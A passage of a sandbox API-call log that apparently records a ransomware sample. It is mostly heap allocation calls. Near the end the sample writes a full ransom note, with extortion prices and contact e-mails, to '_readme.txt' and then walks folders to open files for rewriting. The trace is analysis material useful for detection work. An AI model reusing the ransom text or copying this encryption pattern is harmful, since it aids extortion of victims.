dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.031] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.031] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.031] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.031] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.031] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.031] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0166.031] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.031] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.031] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.031] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0166.031] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.031] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.031] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.031] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.031] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.031] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.031] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.031] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.031] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.031] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.031] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.031] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.031] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0166.031] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.031] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.031] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.031] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.031] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0166.031] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.031] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.031] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.031] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0166.031] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.031] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.031] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.031] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.032] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.032] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.032] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.032] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.032] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.032] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.032] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.032] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.032] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.032] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.032] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.032] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.032] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.032] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.032] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.032] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.032] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.032] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.032] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.032] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.032] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.032] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.032] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.032] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.032] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.032] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.032] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.032] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.032] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0166.032] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.032] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.032] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.032] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.032] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.032] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.032] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.032] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.032] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0166.032] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.032] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.033] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.033] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0166.033] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.033] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.033] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.033] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.033] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.033] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.033] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.033] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.033] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.033] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.033] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.033] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.033] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0166.033] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.033] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.033] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.033] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.033] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0166.033] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.033] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.033] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.033] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.033] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.033] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.033] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.033] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.033] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.033] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.033] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.033] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.033] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.033] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.033] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.033] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.033] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.033] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.033] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.033] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.034] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.034] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.034] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.034] PathFindFileNameW (pszPath="C:\\Boot\\pt-BR\\") returned="pt-BR\\" [0166.034] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.034] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.034] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0166.034] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.034] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0166.034] PathFindFileNameW (pszPath="") returned="" [0166.034] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.034] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0166.035] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0166.035] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x800) returned 0x3b40090 [0166.035] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b40090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0166.035] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x810) returned 0x3b19ec8 [0166.035] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0166.035] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.035] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0166.035] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.035] FreeLibrary (hLibModule=0x759d0000) returned 1 [0166.035] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.035] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.035] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0166.035] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0166.035] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x81c) returned 0x3b19ec8 [0166.035] PathAppendW (in: pszPath="C:\\Boot\\pt-BR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned 1 [0166.035] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.035] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0166.035] PathFileExistsW (pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned 0 [0166.035] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x7d00) returned 0x3b47e70 [0166.035] lstrcpyW (in: lpString1=0x3b47e70, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0166.035] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0166.035] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b1a750 [0166.035] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\_readme.txt" (normalized: "c:\\boot\\pt-br\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0166.036] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b1a750 | out: hHeap=0xcd0000) returned 1 [0166.036] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b47e70 | out: hHeap=0xcd0000) returned 1 [0166.036] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.036] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0166.036] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0166.036] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0166.036] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0166.036] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0166.036] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0166.036] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b44f60 [0166.036] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0166.036] PathFindExtensionW (pszPath="C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned=".mui" [0166.036] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0166.038] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44f60 | out: hHeap=0xcd0000) returned 1 [0166.038] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0166.038] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0166.038] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.038] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c908 | out: hHeap=0xcd0000) returned 1 [0166.038] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0166.038] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c908 [0166.038] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0166.038] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, 